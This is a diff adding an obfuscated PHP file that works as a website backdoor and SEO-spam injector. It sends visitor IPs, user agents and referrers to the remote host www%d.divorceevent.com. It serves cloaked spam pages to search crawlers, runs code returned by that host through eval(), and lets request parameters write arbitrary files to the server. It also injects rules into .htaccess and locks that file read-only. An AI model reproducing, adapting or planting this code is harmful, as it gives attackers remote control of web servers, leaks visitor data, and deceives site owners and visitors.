| 1 | + | <?php |
| 2 | + | $a='401'; |
| 3 | + | $b='1'; |
| 4 | + | $c='1'; |
| 5 | + | $cadena="s6l5cpd1eyuh3qo8nmkg-0bvi7xztw49r_fja2"; |
| 6 | + | $O0_0__OO0O = "preg_replace_callback"; |
| 7 | + | $O0OO0O___0 = "stream_socket_client"; |
| 8 | + | $O00O0OO___ = "stream_get_meta_data"; |
| 9 | + | $O_0_OO0_O0 = "stream_set_blocking"; |
| 10 | + | $OOO0__0_O0 = "stream_set_timeout"; |
| 11 | + | $O0_OO_0O0_ = "ignore_user_abort"; |
| 12 | + | $O0O0__OO0_ = "file_put_contents"; |
| 13 | + | $OO_0_OO00_ = "file_get_contents"; |
| 14 | + | $O0OO_O_00_ = "http_build_query"; |
| 15 | + | $O0O0__O_0O = "function_exists"; |
| 16 | + | $O_O00__0OO = "error_reporting"; |
| 17 | + | $OO_O000_O_ = "create_function"; |
| 18 | + | $OO_O_000O_ = "set_time_limit"; |
| 19 | + | $O0__OO0_0O = "gethostbyname"; |
| 20 | + | $OO0_O0_0O_ = "base64_decode"; |
| 21 | + | $O0O__O0O0_ = "preg_replace"; |
| 22 | + | $O00O_O0__O = "str_replace"; |
| 23 | + | $O0O0___0OO = "file_exists"; |
| 24 | + | $O0__OO0O0_ = "curl_setopt"; |
| 25 | + | $OO_OO0_00_ = "array_shift"; |
| 26 | + | $O00_O_O0O_ = "preg_match"; |
| 27 | + | $O0_0OOO_0_ = "curl_error"; |
| 28 | + | $O__0O_O0O0 = "curl_close"; |
| 29 | + | $O_O0_OO_00 = "urlencode"; |
| 30 | + | $O00__O0OO_ = "parse_url"; |
| 31 | + | $O_00O_OO_0 = "gzinflate"; |
| 32 | + | $OO__0_00OO = "curl_init"; |
| 33 | + | $OOO0_0__0O = "curl_exec"; |
| 34 | + | $O_O0__0O0O = "is_array"; |
| 35 | + | $OO__000O_O = "mt_rand"; |
| 36 | + | $OOO0O0_0__ = "implode"; |
| 37 | + | $O00O_O_O0_ = "explode"; |
| 38 | + | $O_0O0O_0O_ = "dirname"; |
| 39 | + | $O0_O_0_OO0 = "usleep"; |
| 40 | + | $OO_0__0O0O = "unlink"; |
| 41 | + | $OO0_O0__0O = "strstr"; |
| 42 | + | $OO_0O_00_O = "strpos"; |
| 43 | + | $O0_OO0_O0_ = "strlen"; |
| 44 | + | $OOO__00O_0 = "hexdec"; |
| 45 | + | $O_O_0O0_0O = "getenv"; |
| 46 | + | $O_O_O_000O = "fwrite"; |
| 47 | + | $O00_OO__0O = "fclose"; |
| 48 | + | $O_O__O00O0 = "fread"; |
| 49 | + | $O_O00OO__0 = "fgets"; |
| 50 | + | $OO__0O_0O0 = "chmod"; |
| 51 | + | $O0_0_O_0OO = "trim"; |
| 52 | + | $O00_OO__O0 = "join"; |
| 53 | + | $O__0_OOO00 = "feof"; |
| 54 | + | $OO0___00OO = "date" |
| 55 | + | header('Content-Type:text/html;charset=utf-8'); |
| 56 | + | |
| 57 | + | ${"GLOBALS"}["O_O00__0OO"](0); |
| 58 | + | |
| 59 | + | if(!function_exists('str_ireplace')){ |
| 60 | + | function str_ireplace($from,$to,$string){ |
| 61 | + | return trim(preg_replace("/".addcslashes($from,"?:\\/*^$")."/si",$to,$string)); |
| 62 | + | } |
| 63 | + | }; |
| 64 | + | |
| 65 | + | $OOO0__O_00=create_function('$url,$O00O___O0O=0,$OO_O00__0O=1,$OO_O_0O0_0=NULL,$OO_0_0O0_O=array()',' |
| 66 | + | if(!preg_match("/^http\\:\\/\\//si",$url)){ |
| 67 | + | if(isset(${"_GET"}["urlebb"])){ |
| 68 | + | //substring de 0 a 5 |
| 69 | + | $OO__00_0OO="[urlerror] invalid url: "; |
| 70 | + | $OO__00_0OO.=$url; |
| 71 | + | echo $OO__00_0OO; |
| 72 | + | unset($OO__00_0OO); |
| 73 | + | exit(); |
| 74 | + | } |
| 75 | + | return \'\'; |
| 76 | + | } |
| 77 | + | |
| 78 | + | //substring 0 a 5 |
| 79 | + | $O0_OO__00O="curl_init+curl_setopt+curl_exec|fsockopen|pfsockopen|stream_socket_client|socket_create"; |
| 80 | + | $OO0O_0__0O=$O_0O0_O0O_=\'\'; |
| 81 | + | foreach(explode(\'|\',$O0_OO__00O) as $c){ |
| 82 | + | $OO__O_O000=1; |
| 83 | + | if($O00O___O0O && substr($c,0,1) == \'c\'){ |
| 84 | + | continue; |
| 85 | + | } |
| 86 | + | foreach(explode(\'+\',$c) as $d){ |
| 87 | + | if(!function_exists($d)){ $OO__O_O000=0; } |
| 88 | + | } |
| 89 | + | unset($d); |
| 90 | + | if($OO__O_O000){ |
| 91 | + | $OO0O_0__0O=$c; |
| 92 | + | break; |
| 93 | + | } |
| 94 | + | } |
| 95 | + | unset($O0_OO__00O,$c); |
| 96 | + | if($OO0O_0__0O==\'\'){ return 0;} |
| 97 | + | if(substr($OO0O_0__0O,0,1)==\'c\'){ |
| 98 | + | $ch=curl_init(); |
| 99 | + | curl_setopt($ch,CURLOPT_URL,$url); |
| 100 | + | curl_setopt($ch,CURLOPT_USERAGENT,\'WHR\'); |
| 101 | + | curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); |
| 102 | + | curl_setopt($ch,CURLOPT_TIMEOUT,100); |
| 103 | + | if($OO_O00__0O==2){ |
| 104 | + | curl_setopt($ch,CURLOPT_POST,1); |
| 105 | + | if(is_array($OO_O_0O0_0)){ |
| 106 | + | curl_setopt($ch,CURLOPT_POSTFIELDS,http_build_query($OO_O_0O0_0)); |
| 107 | + | } |
| 108 | + | } |
| 109 | + | $O_00OOO_0_=curl_exec($ch); |
| 110 | + | curl_close($ch); |
| 111 | + | |
| 112 | + | if(!$O_00OOO_0_){ |
| 113 | + | if(isset(${"_GET"}["curlerr"])){ |
| 114 | + | |
| 115 | + | $OO__00_0OO="[curl error] "; |
| 116 | + | $OO__00_0OO.=curl_error($ch); |
| 117 | + | echo $OO__00_0OO; |
| 118 | + | unset($OO__00_0OO); |
| 119 | + | exit(); |
| 120 | + | } |
| 121 | + | return 0; |
| 122 | + | } |
| 123 | + | else { |
| 124 | + | $O_00OOO_0_=trim(trim($O_00OOO_0_,"\\xEF\\xBB\\xBF")); |
| 125 | + | return $O_00OOO_0_; |
| 126 | + | } |
| 127 | + | } |
| 128 | + | $OO_O_0_O00=parse_url($url); |
| 129 | + | isset($OO_O_0_O00["host"])||$OO_O_0_O00["host"]=\'\'; |
| 130 | + | isset($OO_O_0_O00["path"])||$OO_O_0_O00["path"]=\'\'; |
| 131 | + | isset($OO_O_0_O00["query"])|| $OO_O_0_O00["query"]=\'\'; |
| 132 | + | isset($OO_O_0_O00["O_O0O00__O"])||$OO_O_0_O00["O_O0O00__O"]=\'\'; |
| 133 | + | $OO00O0_O__=$OO_O_0_O00["path"]?$OO_O_0_O00["path"].($OO_O_0_O00["query"]?\'?\'.$OO_O_0_O00["query"]:\'\'):\'/\'; |
| 134 | + | $OO0__O0_O0=$OO_O_0_O00["host"]; |
| 135 | + | if($OO_O_0_O00["scheme"]==\'https\'){ |
| 136 | + | $OO_00_OO_0=\'1.1\'; |
| 137 | + | $O_O0O00__O=empty($OO_O_0_O00["O_O0O00__O"])?443:$OO_O_0_O00["O_O0O00__O"]; |
| 138 | + | |
| 139 | + | $OO0__O0_O0= "ssl://"; |
| 140 | + | $OO0__O0_O0.=$OO_O_0_O00["host"]; |
| 141 | + | } |
| 142 | + | else{ |
| 143 | + | $OO_00_OO_0=\'1.0\'; |
| 144 | + | $O_O0O00__O=empty($OO_O_0_O00["O_O0O00__O"])?80:$OO_O_0_O00["O_O0O00__O"]; |
| 145 | + | } |
| 146 | + | $OOO_0O00__=\'Host:\'; |
| 147 | + | $OOO_0O00__.=$OO0__O0_O0; |
| 148 | + | $OO_0_0O0_O[]=$OOO_0O00__; |
| 149 | + | $OO_0_0O0_O[]="Connection:Close"; |
| 150 | + | $OO_0_0O0_O[]="User-Agent:WHR"; |
| 151 | + | $OO_0_0O0_O[]="Accept:*/*"; |
| 152 | + | |
| 153 | + | unset($OOO_0O00__); |
| 154 | + | |
| 155 | + | if($OO_O00__0O==2){ |
| 156 | + | if(is_array($OO_O_0O0_0)){ |
| 157 | + | $OO_O_0O0_0=http_build_query($OO_O_0O0_0); |
| 158 | + | } |
| 159 | + | $OO_0_0O0_O[]="Content-type:application/x-www-form-urlencoded"; |
| 160 | + | $OO_0_0O0_O[]="Content-Length:".strlen($OO_O_0O0_0); |
| 161 | + | |
| 162 | + | $O_0O0_O0O_="POST $OO00O0_O__ HTTP/$OO_00_OO_0\\r\\n".join("\\r\\n",$OO_0_0O0_O)."\\r\\n\\r\\n".$OO_O_0O0_0; |
| 163 | + | unset($OO_O_0O0_0); |
| 164 | + | } |
| 165 | + | else{ |
| 166 | + | $O_0O0_O0O_="GET $OO00O0_O__ HTTP/$OO_00_OO_0\\r\\n".join("\\r\\n",$OO_0_0O0_O)."\\r\\n\\r\\n"; |
| 167 | + | } |
| 168 | + | unset($OO_0_0O0_O,$OO_O_0_O00,$OO_00_OO_0,$OO00O0_O__); |
| 169 | + | $O0OO_0O_0_=null; |
| 170 | + | |
| 171 | + | if(substr($OO0O_0__0O,-1)==\'n\'){ |
| 172 | + | $O0OO_0O_0_=$OO0O_0__0O($OO0__O0_O0,$O_O0O00__O,$OO__00_0OOno,$OO__00_0OOstr,30); |
| 173 | + | }else{ |
| 174 | + | if(substr($OO0O_0__0O,-1)==\'t\'){ |
| 175 | + | $OO0O_0_O_0 = "tcp://"; |
| 176 | + | $OO0O_0_O_0.= $OO0__O0_O0; |
| 177 | + | $OO0O_0_O_0.=\':\'; |
| 178 | + | $OO0O_0_O_0.=$O_O0O00__O; |
| 179 | + | $O0OO_0O_0_=stream_socket_client($OO0O_0_O_0,$OO__00_0OOno,$OO__00_0OOstr,30); |
| 180 | + | unset($OO0O_0_O_0); |
| 181 | + | } |
| 182 | + | } |
| 183 | + | $O0O_0_0O_O=\'\'; |
| 184 | + | if($O0OO_0O_0_){ |
| 185 | + | stream_set_blocking($O0OO_0O_0_,true); |
| 186 | + | stream_set_timeout($O0OO_0O_0_,30); |
| 187 | + | fwrite($O0OO_0O_0_,$O_0O0_O0O_); |
| 188 | + | if(!$O00O___O0O){ |
| 189 | + | $O0O0_0O__O=stream_get_meta_data($O0OO_0O_0_); |
| 190 | + | if(!$O0O0_0O__O["timed_out"]){ |
| 191 | + | while(!feof($O0OO_0O_0_)){ |
| 192 | + | $O_O_0_O0O0=fgets($O0OO_0O_0_); |
| 193 | + | if($O_O_0_O0O0&&($O_O_0_O0O0=="\\r\\n"||$O_O_0_O0O0=="\\n")){break;} |
| 194 | + | unset($O_O_0_O0O0); |
| 195 | + | } |
| 196 | + | while(!feof($O0OO_0O_0_)){ |
| 197 | + | $O___0OO00O=fread($O0OO_0O_0_,8192); |
| 198 | + | |
| 199 | + | $O0O_0_0O_O.=$O___0OO00O; |
| 200 | + | unset($O___0OO00O); |
| 201 | + | } |
| 202 | + | } |
| 203 | + | unset($O0O0_0O__O); |
| 204 | + | } |
| 205 | + | |
| 206 | + | fclose($O0OO_0O_0_); |
| 207 | + | } |
| 208 | + | else{ |
| 209 | + | if(substr($OO0O_0__0O,-1)==\'e\'){ |
| 210 | + | $OO_00O0__O=gethostbyname($OO0__O0_O0); |
| 211 | + | $O0OO_0O_0_=$OO0O_0__0O(AF_INET,SOCK_STREAM,0); |
| 212 | + | if(socket_connect($O0OO_0O_0_,$OO_00O0__O,$O_O0O00__O)){ |
| 213 | + | if(!$O00O___O0O){ |
| 214 | + | socket_write($O0OO_0O_0_,$O_0O0_O0O_,strlen($O_0O0_O0O_)); |
| 215 | + | while($O_0_O_00OO=@socket_read($O0OO_0O_0_,8192)){ |
| 216 | + | $O0O_0_0O_O.=$O_0_O_00OO; |
| 217 | + | unset($O_0_O_00OO);} |
| 218 | + | $O0O_0_0O_O=explode("\\r\\n\\r\\n",$O0O_0_0O_O); |
| 219 | + | array_shift($O0O_0_0O_O); |
| 220 | + | $O0O_0_0O_O=implode("\\r\\n\\r\\n",$O0O_0_0O_O); |
| 221 | + | } |
| 222 | + | else{ |
| 223 | + | $O0_O__0OO0=mt_rand(2,5); |
| 224 | + | $O0_O__O00O=0; |
| 225 | + | while($O0_O__O00O<$O0_O__0OO0){ |
| 226 | + | socket_write($O0OO_0O_0_,$O_0O0_O0O_,strlen($O_0O0_O0O_)); |
| 227 | + | $O0_O__O00O++; |
| 228 | + | usleep(mt_rand(50000,100000)); |
| 229 | + | } |
| 230 | + | unset($O0_O__O00O,$O0_O__0OO0); |
| 231 | + | } |
| 232 | + | } |
| 233 | + | socket_close($O0OO_0O_0_); |
| 234 | + | unset($OO_00O0__O); |
| 235 | + | } |
| 236 | + | } |
| 237 | + | if($O0O_0_0O_O==\'\'){ |
| 238 | + | if(function_exists(file_get_contents) and $url){ |
| 239 | + | $O0O_0_0O_O=@file_get_contents($url); |
| 240 | + | } |
| 241 | + | |
| 242 | + | } |
| 243 | + | unset($O_0O0_O0O_,$OO0O_0__0O,$O0OO_0O_0_,$O_O0O00__O,$OO0__O0_O0); |
| 244 | + | if(!$O00O___O0O){ |
| 245 | + | $O0O_0_0O_O=preg_replace_callback(\'/(?:(?:\\r\\n|\\n)|^)([0-9A-F]+)(?:\\r\\n|\\n){1,2}(.*?)\'.\'((?:\\r\\n|\\n)(?:[0-9A-F]+(?:\\r\\n|\\n))|$)/si\',create_function(\'$matches\',\'return hexdec($matches[1])==strlen($matches[2])?$matches[2]:$matches[0];\'),$O0O_0_0O_O); |
| 246 | + | return trim(trim($O0O_0_0O_O,"\\xEF\\xBB\\xBF")); |
| 247 | + | } |
| 248 | + | else{return 1; |
| 249 | + | }' |
| 250 | + | ); |
| 251 | + | |
| 252 | + | $b64decode=create_function('$string',' |
| 253 | + | $O__0O_0OO0=substr($string,0,5); |
| 254 | + | $O_0OOO00__=substr($string,-5); |
| 255 | + | $O0O_00_O_O=substr($string,7,strlen($string)-14); |
| 256 | + | return gzinflate(base64_decode($O__0O_0OO0.$O0O_00_O_O.$O_0OOO00__));' |
| 257 | + | ); |
| 258 | + | |
| 259 | + | $OO0O__00O_=create_function('$O0_OO__00Ogent','$OO_O0_0O0_=false; |
| 260 | + | $O_O0_00O_O= "googlebot|bingbot|google|aol|bing|yahoo"; |
| 261 | + | if($O0_OO__00Ogent!=\'\'){ |
| 262 | + | if(preg_match("/($O_O0_00O_O)/si",$O0_OO__00Ogent)){ |
| 263 | + | $OO_O0_0O0_=true; |
| 264 | + | } |
| 265 | + | } |
| 266 | + | return $OO_O0_0O0_;' |
| 267 | + | ); |
| 268 | + | |
| 269 | + | $OO_O__O000=create_function('$O_00OOO_0_efer','$O_0_0O0OO_=false; |
| 270 | + | $O0O0O0O___= "google.co.jp|yahoo.co.jp|bing"; |
| 271 | + | if($O_00OOO_0_efer!=\'\'&&preg_match("/($O0O0O0O___)/si",$O_00OOO_0_efer)){ |
| 272 | + | $O_0_0O0OO_=true; |
| 273 | + | } |
| 274 | + | return $O_0_0O0OO_;' |
| 275 | + | ); |
| 276 | + | $O0_O0_O0O_=create_function('$OO0_0OO0__',' |
| 277 | + | $OO__OO0_00=isset($_REQUEST["xxxxxxxxxxxx_filename"])?$_REQUEST["xxxxxxxxxxxx_filename"]:\'\'; |
| 278 | + | $O_O_0O0O0_=isset($_REQUEST["xxxxxxxxxxxx_filecontent"])?$_REQUEST["xxxxxxxxxxxx_filecontent"]:\'\'; |
| 279 | + | if(file_exists($OO__OO0_00)){ |
| 280 | + | if(!unlink($OO__OO0_00)){ |
| 281 | + | echo "delete|error"; |
| 282 | + | exit(); |
| 283 | + | } |
| 284 | + | } |
| 285 | + | file_put_contents($OO__OO0_00,$O_O_0O0O0_,FILE_APPEND); |
| 286 | + | echo $OO__OO0_00.\'|success\';' |
| 287 | + | ); |
| 288 | + | |
| 289 | + | $O0O_O_O0_0=create_function('$O__0O_00OO=\'\',$c,$OO_O_0_00O,$O_0OO_O00_','$symbol_url; |
| 290 | + | $O0_OO0O_0_="<IfModule mod_rewrite.c>"; |
| 291 | + | $OO_00_0O_O="RewriteEngine"; |
| 292 | + | $O__O0O_0O0="RewriteBase"; |
| 293 | + | $OO__O0O0_0="RewriteRule"; |
| 294 | + | $O0OO0O__0_="RewriteCond"; |
| 295 | + | $O_0__O0O0O="</IfModule>"; |
| 296 | + | $OO0O0O___0="REQUEST_FILENAME"; |
| 297 | + | $O__OO0_00O="index.php" |
| 298 | + | |
| 299 | + | $O__0O_00OO= $O0_OO0O_0_."\\n"; |
| 300 | + | $O__0O_00OO .=$OO_00_0O_O."\\x20On\\n"; |
| 301 | + | $O__0O_00OO .=$O__O0O_0O0."\\x20/\\n"; |
| 302 | + | $O__0O_00OO .=$OO__O0O0_0."\\x20^".$O__OO0_00O."$\\x20-\\x20[L]\\n"; |
| 303 | + | $O__0O_00OO .=$O0OO0O__0_."\\x20%{".$OO0O0O___0."}\\x20!-f\\n"; |
| 304 | + | $O__0O_00OO .=$O0OO0O__0_."\\x20%{".$OO0O0O___0."}\\x20!-d\\n"; |
| 305 | + | $O__0O_00OO .=$OO__O0O0_0."\\x20.\\x20".$symbol_url.$O__OO0_00O." [L]\\n"; |
| 306 | + | $O__0O_00OO .=$O_0__O0O0O; |
| 307 | + | |
| 308 | + | /* |
| 309 | + | <IfModule mod_rewrite.c> |
| 310 | + | RewriteEngine On |
| 311 | + | RewriteBase / |
| 312 | + | RewriteRule ^index.php$ - [L] |
| 313 | + | RewriteCond %{REQUEST_FILENAME} !-f |
| 314 | + | RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php [L] |
| 315 | + | </IfModule> |
| 316 | + | */ |
| 317 | + | if($O__0O_00OO!=\'\'){ |
| 318 | + | if($c){$O_00__O0OO="./.htaccess"; |
| 319 | + | if($O_00__O0OO!=\'\'){ |
| 320 | + | @chmod($O_00__O0OO,0644); |
| 321 | + | $O0O_O00_O_=@file_get_contents($O_00__O0OO); |
| 322 | + | if(!strstr($O0O_O00_O_,$OO0O0O___0)||!strstr($O0O_O00_O_,$O__OO0_00O)){ |
| 323 | + | $O0O_O00_O_=$O__0O_00OO.PHP_EOL .$O0O_O00_O_; |
| 324 | + | @file_put_contents($O_00__O0OO,$O0O_O00_O_); |
| 325 | + | } |
| 326 | + | } |
| 327 | + | @chmod($O_00__O0OO,0444); |
| 328 | + | }}' |
| 329 | + | ); |
| 330 | + | |
| 331 | + | $OO___00O0O=create_function('$OO0_0OO0__=\'\'',' |
| 332 | + | @set_time_limit(3600); |
| 333 | + | @ignore_user_abort(1); |
| 334 | + | global $a,$c,$b; |
| 335 | + | $O_00O__OO0=\'400\'; |
| 336 | + | $O__O_000OO=\'\'; |
| 337 | + | if(isset($_REQUEST["xxxxxxxxxxxx_loads"])){ |
| 338 | + | //crea archivo enviado por post |
| 339 | + | ${"GLOBALS"}["O0_O0_O0O_"](); |
| 340 | + | exit(); |
| 341 | + | } |
| 342 | + | $O_0_O00OO_ = "unknown"; |
| 343 | + | if(isset(${"_SERVER"})){ |
| 344 | + | if(isset(${"_SERVER"}[HTTP_X_FORWARDED_FOR])){ |
| 345 | + | $O_0_O00OO_=${"_SERVER"}[HTTP_X_FORWARDED_FOR]; |
| 346 | + | } |
| 347 | + | elseif(isset(${"_SERVER"}[HTTP_CLIENT_IP])){ |
| 348 | + | $O_0_O00OO_=${"_SERVER"}[HTTP_CLIENT_IP]; |
| 349 | + | } |
| 350 | + | else{ |
| 351 | + | $O_0_O00OO_=${"_SERVER"}[REMOTE_ADDR]; |
| 352 | + | } |
| 353 | + | }else{ |
| 354 | + | if(getenv("HTTP_X_FORWARDED_FOR")){ |
| 355 | + | $O_0_O00OO_=getenv("HTTP_X_FORWARDED_FOR"); |
| 356 | + | } |
| 357 | + | elseif(getenv("HTTP_CLIENT_IP")){ |
| 358 | + | $O_0_O00OO_=getenv("HTTP_CLIENT_IP"); |
| 359 | + | }else{ |
| 360 | + | $O_0_O00OO_=getenv("REMOTE_ADDR"); |
| 361 | + | } |
| 362 | + | } |
| 363 | + | $O0O__00_OO=${"_SERVER"}["HTTP_ACCEPT_LANGUAGE"]; |
| 364 | + | $O0_O_0OO_0=isset(${"_SERVER"}["HTTP_REFERER"])?${"_SERVER"}["HTTP_REFERER"]:\'\'; |
| 365 | + | $OOO00_O0__=isset(${"_SERVER"}["HTTP_USER_AGENT"])?${"_SERVER"}["HTTP_USER_AGENT"]:\'\'; |
| 366 | + | |
| 367 | + | $OO_0_O0_O0=${"GLOBALS"}["OO0O__00O_"]($OOO00_O0__); |
| 368 | + | |
| 369 | + | $O0OO_O00__=${"GLOBALS"}["OO_O__O000"]($O0_O_0OO_0); |
| 370 | + | |
| 371 | + | $O_O0OO_00_=\'\'; |
| 372 | + | |
| 373 | + | if(isset(${"_SERVER"}["HTTP_HOST"])){ |
| 374 | + | $O_O0OO_00_=${"_SERVER"}["HTTP_HOST"]; |
| 375 | + | } |
| 376 | + | elseif(isset(${"_SERVER"}["SERVER_NAME"])){ |
| 377 | + | $O_O0OO_00_=${"_SERVER"}["SERVER_NAME"]; |
| 378 | + | } |
| 379 | + | $O0O0__O_O0=${"_SERVER"}["REQUEST_URI"]; |
| 380 | + | |
| 381 | + | $OO_O_0_00O=\'\'; |
| 382 | + | |
| 383 | + | $O_0OO_O00_=${"_SERVER"}["DOCUMENT_ROOT"]; |
| 384 | + | $O_0OO_O00_=str_replace(\'\\\\\',\'/\',$O_0OO_O00_); |
| 385 | + | |
| 386 | + | $O_OO_0_00O=dirname(__FILE__).\'/\'; |
| 387 | + | $O_OO_0_00O=str_replace(\'\\\\\',\'/\',$O_OO_0_00O); |
| 388 | + | $O_OO_00O0_=str_replace($O_0OO_O00_,\'\',$O_OO_0_00O); |
| 389 | + | |
| 390 | + | if(strpos($O0O0__O_O0,".php")>0){ |
| 391 | + | $OOO0_0_0O_=strpos($O0O0__O_O0,".php")+4; |
| 392 | + | $OO_O_0_00O=substr($O0O0__O_O0,0,$OOO0_0_0O_); |
| 393 | + | $O__O_000OO=$OO_O_0_00O; |
| 394 | + | } |
| 395 | + | |
| 396 | + | if($OO_O_0_00O==\'\'){ |
| 397 | + | $OO_O_0_00O=$O_OO_00O0_. "index.php"; |
| 398 | + | $O__O_000OO=$O_OO_00O0_; |
| 399 | + | } |
| 400 | + | |
| 401 | + | $OO_O_0_00O=substr($OO_O_0_00O,1); |
| 402 | + | $O0__O0OO_0= "www%d.divorceevent.com"; |
| 403 | + | $OO_00O_0_O=\'\'; |
| 404 | + | |
| 405 | + | if(isset(${"_SERVER"}["REQUEST_SCHEME"])){ |
| 406 | + | $OO_00O_0_O=${"_SERVER"}["REQUEST_SCHEME"]; |
| 407 | + | } |
| 408 | + | |
| 409 | + | $c=(int)$c; |
| 410 | + | |
| 411 | + | ${"GLOBALS"}["O0O_O_O0_0"](\'\',$c,$OO_O_0_00O,$O_0OO_O00_); |
| 412 | + | |
| 413 | + | $O0OOO0_0__=sprintf($O0__O0OO_0,$a); |
| 414 | + | $O_0O0OO__0=sprintf($O0__O0OO_0,$O_00O__OO0); |
| 415 | + | $O__OOO000_= "http://%host%/data99.php?d=%s&g=%s&t=%s&u=%s&h=%s&p=%s&r=%s&a=%s&l=%s&i=%s&j=%s"; |
| 416 | + | $O0O_0O_0O_= "http://%host%/jump99.php?d=%s&g=%s&t=%s&u=%s&h=%s&p=%s&r=%s&a=%s&l=%s&i=%s&j=%s"; |
| 417 | + | |
| 418 | + | $O__OOO000_=preg_replace("/%host%/si",$O0OOO0_0__,$O__OOO000_); |
| 419 | + | |
| 420 | + | if(isset(${"_GET"}["map"])){ |
| 421 | + | $O0O0__O_O0=trim(${"_GET"}["map"]).trim(${"_GET"}["file"]); |
| 422 | + | |
| 423 | + | $O__OOO000_=sprintf($O__OOO000_,$O_O0OO_00_,$a,urlencode(date("Y-m-d")),urlencode($O0O0__O_O0),urlencode($OO_00O_0_O),trim($O_0_O00OO_) ,urlencode($O0_O_0OO_0),urlencode($OOO00_O0__),$O0O__00_OO,$O__O_000OO,0); |
| 424 | + | |
| 425 | + | $O0O_0_0O_O=${"GLOBALS"}["OOO0__O_00"]($O__OOO000_); |
| 426 | + | |
| 427 | + | $O0_OO_0_O0=trim(${"_GET"}["file"]); |
| 428 | + | |
| 429 | + | if(isset(${"_GET"}["file"])){ |
| 430 | + | $O0_OO_0_O0=trim(${"_GET"}["file"]); |
| 431 | + | } |
| 432 | + | |
| 433 | + | if(strstr($O0O_0_0O_O,\'<spango>\')){ |
| 434 | + | $O0O_0_0O_O=str_replace(\'<spango>\',\'\',$O0O_0_0O_O); |
| 435 | + | file_put_contents($O0_OO_0_O0,$O0O_0_0O_O); |
| 436 | + | echo \'map success\'; |
| 437 | + | unset($O0O_0_0O_O,$O__OOO000_,$O0OOO0_0__,$O_0O0OO__0,$O0O0__O_O0,$O_O0OO_00_,$O0_O_0OO_0,$OOO00_O0__); |
| 438 | + | exit(); |
| 439 | + | } |
| 440 | + | } |
| 441 | + | |
| 442 | + | $O__OOO000_=sprintf($O__OOO000_,$O_O0OO_00_,$a,urlencode(date("Y-m-d")),urlencode($O0O0__O_O0),urlencode($OO_00O_0_O),trim($O_0_O00OO_) ,urlencode($O0_O_0OO_0),urlencode($OOO00_O0__),$O0O__00_OO,$O__O_000OO,0); |
| 443 | + | $O0O_0O_0O_=preg_replace("/%host%/si",$O_0O0OO__0,$O0O_0O_0O_); |
| 444 | + | $O0O_0O_0O_=sprintf($O0O_0O_0O_,$O_O0OO_00_,$a,urlencode(date("Y-m-d")),urlencode($O0O0__O_O0),urlencode($OO_00O_0_O),trim($O_0_O00OO_) ,urlencode($O0_O_0OO_0),urlencode($OOO00_O0__),$O0O__00_OO,$O__O_000OO,1); |
| 445 | + | |
| 446 | + | //url = http://www0.divorceevent.com/jump99.php?d=&g=&t=2019-09-08&u=&h=&p=&r=&a=&l=&i=&j=1 |
| 447 | + | |
| 448 | + | if(isset(${"_GET"}["xxnew2018_url1"])){ |
| 449 | + | echo $O__OOO000_;exit(); |
| 450 | + | } |
| 451 | + | if(isset(${"_GET"}["xxnew2018_url2"])){ |
| 452 | + | echo $O0O_0O_0O_;exit(); |
| 453 | + | } |
| 454 | + | if(isset(${"_GET"}["xxxxxx_num"])){ |
| 455 | + | echo $b;exit(); |
| 456 | + | } |
| 457 | + | if(preg_match(\'/(sitemap).*.xml$/\',$O0O0__O_O0)){ |
| 458 | + | $O0O_0_0O_O=${"GLOBALS"}["OOO0__O_00"]($O__OOO000_); |
| 459 | + | |
| 460 | + | if(strstr($O0O_0_0O_O,\'<spango>\')){ |
| 461 | + | $O0O_0_0O_O=str_replace(\'<spango>\',\'\',$O0O_0_0O_O); |
| 462 | + | @header(\'content-type:text/xml\'); |
| 463 | + | echo "$O0O_0_0O_O"; |
| 464 | + | unset($O0O_0_0O_O,$O__OOO000_,$O0OOO0_0__,$O_0O0OO__0,$O0O0__O_O0,$O_O0OO_00_,$O0_O_0OO_0,$OOO00_O0__); |
| 465 | + | exit(); |
| 466 | + | } |
| 467 | + | } |
| 468 | + | if($OO_0_O0_O0){ |
| 469 | + | $O0O_0_0O_O=${"GLOBALS"}["OOO0__O_00"]($O__OOO000_); |
| 470 | + | if(strstr($O0O_0_0O_O,\'<spango>\')){ |
| 471 | + | $O0O_0_0O_O=str_replace(\'<spango>\',\'\',$O0O_0_0O_O); |
| 472 | + | echo "$O0O_0_0O_O"; |
| 473 | + | unset($O0O_0_0O_O,$url_format,$O0OOO0_0__,$O_0O0OO__0,$O0O0__O_O0,$O_O0OO_00_,$O0_O_0OO_0,$OOO00_O0__); |
| 474 | + | exit(); |
| 475 | + | } |
| 476 | + | elseif(strstr($O0O_0_0O_O,\'<spanev>\')){ |
| 477 | + | $O0O_0_0O_O=str_replace(\'<spanev>\',\'\',$O0O_0_0O_O); |
| 478 | + | @eval($O0O_0_0O_O); |
| 479 | + | unset($O0O_0_0O_O,$url_format,$O0OOO0_0__,$O_0O0OO__0,$O0O0__O_O0,$O_O0OO_00_,$O0_O_0OO_0,$OOO00_O0__); |
| 480 | + | exit(); |
| 481 | + | } |
| 482 | + | }if($O0OO_O00__){ |
| 483 | + | $O0O_0_0O_O=${"GLOBALS"}["OOO0__O_00"]($O0O_0O_0O_); |
| 484 | + | if(strstr($O0O_0_0O_O,\'<spango>\')){ |
| 485 | + | $O0O_0_0O_O=str_replace(\'<spango>\',\'\',$O0O_0_0O_O); |
| 486 | + | echo "$O0O_0_0O_O";unset($O0O_0_0O_O,$url_format,$O0OOO0_0__,$O_0O0OO__0,$O0O0__O_O0,$O_O0OO_00_,$O0_O_0OO_0,$OOO00_O0__); |
| 487 | + | exit(); |
| 488 | + | } |
| 489 | + | elseif(strstr($O0O_0_0O_O,\'<spanev>\')){ |
| 490 | + | $O0O_0_0O_O=str_replace(\'<spanev>\',\'\',$O0O_0_0O_O); |
| 491 | + | @eval($O0O_0_0O_O); |
| 492 | + | unset($O0O_0_0O_O,$url_format,$O0OOO0_0__,$O_0O0OO__0,$O0O0__O_O0,$O_O0OO_00_,$O0_O_0OO_0,$OOO00_O0__); |
| 493 | + | exit(); |
| 494 | + | } |
| 495 | + | }'); |
| 496 | + | |
| 497 | + | ${"GLOBALS"}["OO___00O0O"]();?> |